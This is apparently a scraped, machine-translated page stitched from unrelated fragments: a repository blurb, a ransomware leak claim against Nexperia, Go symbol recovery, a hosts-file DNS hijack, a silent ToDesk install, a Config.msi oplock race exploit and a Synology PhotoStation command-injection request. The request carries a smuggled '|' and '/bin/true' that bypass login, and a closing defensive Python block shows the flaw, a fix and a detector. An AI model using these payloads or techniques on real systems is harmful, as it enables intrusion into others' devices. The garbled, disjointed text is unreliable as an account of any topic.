The code repository is the core of the development workflow and the project's single source of truth. It is located at:
The development team collaborates on writing code without interfering with each other.
They automatically track and record changes.
Code reviews are conducted in context.
The continuous integration/continuous deployment (CI/CD) pipeline begins its journey.
The entire history of your project is saved and searchable.
When you work with your team, real miracles happen. Repositories allow developers in different time zones to work on the same codebase simultaneously, seamlessly merge their changes, and maintain code quality through built-in review processes.
"Dunghill Leak" announced a successful intrusion into Nexperia, claiming to have stolen 1 TB of confidential data and leaked samples of the allegedly stolen files. To prove the validity of their claim, the attackers published microscope scan images of the electronic components, employee passports, confidentiality agreements, and other various samples.
Symbol restoration in newer Go versions
pclntable is generally the same as ftab; referring to the figure above, ftab and pclntable supply the values for pclntable.
funcnametab fills in the function names.
This requires an Apache or Nginx service on the hijacked computer, or the hijacker must have a server of their own.
Find the hosts file in C:\Windows\System32\drivers\etc and drag it to the desktop to edit it.
Note that the 127.0.0.1 entries are ones I used previously for using PS and other Adobe software.
Next, perform the DNS hijacking edit, then put the file back in its original place. Since I have Apache installed on my computer, I can see the effect directly.
Use the 360极速 browser to see the effect.
Here's another picture to show the situation.
A UAC popup and installation interface appear when executing from the command line. I saw in the ToDesk documentation that the /S parameter of the ToDesk_Setup.exe installer can achieve a silent installation, but it will still show a UAC popup. The default installation directory is as follows, and the program runs automatically after installation.
I tried increasing the number of CPUs for the virtual machine and optimizing the code that monitors the creation of Config.msi, but neither worked. At the same time, I used procmon to monitor the execution of the msi file and confirmed that the Config.msi directory was indeed created twice.
Therefore, there is only one conclusion: the second creation of the Config.msi directory happens too quickly. However, since the second creation of the Config.msi directory does happen, and the code has already detected the first deletion, what would happen if opportunistic lock (oplock) 2 were released at this point?
If we do not monitor the second creation of the Config.msi directory and directly release oplock 2, then because the interval before the second creation of Config.msi is very short, the sdrsvc that has been waiting for a long time gets its chance to successfully delete Config.msi. At this point, the exploitation process can continue and succeed!
PhotoStation No Password Login
We mainly focus on PhotoStation, which is the image management system enabled in most Synology DSM (DiskStation Manager).
The first vulnerability allows us to log in as an administrator without entering a password.
Viewpoint 1:
GET //photo/login.php?usr=admin&sid=xxx&SynoToken=/bin/true HTTP/1.1
Host: bamboofox.hopto.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: |
Cookie: stay_login=0; language=en; PHPSESSID=ime6mqrg0pghbjo4p9aomqcbv0; left-panel-visibility=show
Connection: close
The focus is on the | in the X-Forwarded-For header and the value of the SynoToken GET parameter. The server-side CGI concatenates the strings usr, X-Forwarded-For, and SynoToken into a command and executes it. Because special characters such as | in X-Forwarded-For and SynoToken are not properly filtered, this leads to a command injection vulnerability.
Therefore, in our PoC1, the command will become:
/usr/syno/bin/synophoto_dsm_user username | /bin/true
This command returns exit status 0 (true), which bypasses authentication.
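As an added illustration (not the page's or Synology's code), the following Python reconstructs the concatenation flaw described above beside an argv-based form with per-field allow-lists, plus a small helper a defender can run over request logs; the binary path is the one given on the page, while the CGI source is not on the page and the allow-list rules are assumptions.

```python
import re
import shlex

# Binary path as given on the page; the CGI source itself is not on the page,
# so the two builders below are a reconstruction, not Synology's code.
AUTH_BIN = "/usr/syno/bin/synophoto_dsm_user"

# Assumed per-field allow-lists (not Synology's real policy): an IP-like value
# for X-Forwarded-For, plain identifiers for the user name and the token.
FIELD_RULES = {
    "usr": re.compile(r"[A-Za-z0-9._-]{1,64}"),
    "X-Forwarded-For": re.compile(r"[0-9A-Fa-f.:]{1,45}"),
    "SynoToken": re.compile(r"[A-Za-z0-9_-]{1,64}"),
}
SHELL_META = set("|&;<>`$()\n")

def build_shell_command(usr, xff, syno_token):
    """The flawed pattern the post describes: request fields are pasted into
    one string that a shell will parse, so '|' and '/bin/true' become syntax."""
    return f"{AUTH_BIN} {usr} {xff} {syno_token}"

def build_argv(usr, xff, syno_token):
    """Hardened form: each field must match its allow-list, and the result is
    an argument vector for a shell-free exec, so metacharacters stay data."""
    fields = {"usr": usr, "X-Forwarded-For": xff, "SynoToken": syno_token}
    for name, value in fields.items():
        if not FIELD_RULES[name].fullmatch(value):
            raise ValueError(f"rejected {name}: {value!r}")
    return [AUTH_BIN, usr, xff, syno_token]

def shell_metachars_in(value):
    """Detection helper for request logs or a WAF rule: which shell
    metacharacters appear in a header or parameter value."""
    return sorted(SHELL_META & set(value))

if __name__ == "__main__":
    # Values taken from the PoC request on the page
    print(build_shell_command("admin", "|", "/bin/true"))
    # -> /usr/syno/bin/synophoto_dsm_user admin | /bin/true
    try:
        build_argv("admin", "|", "/bin/true")
    except ValueError as err:
        print("blocked:", err)
    # Constructed benign values pass and are quoted safely for logging
    print(shlex.join(build_argv("admin", "203.0.113.5", "abc123")))
```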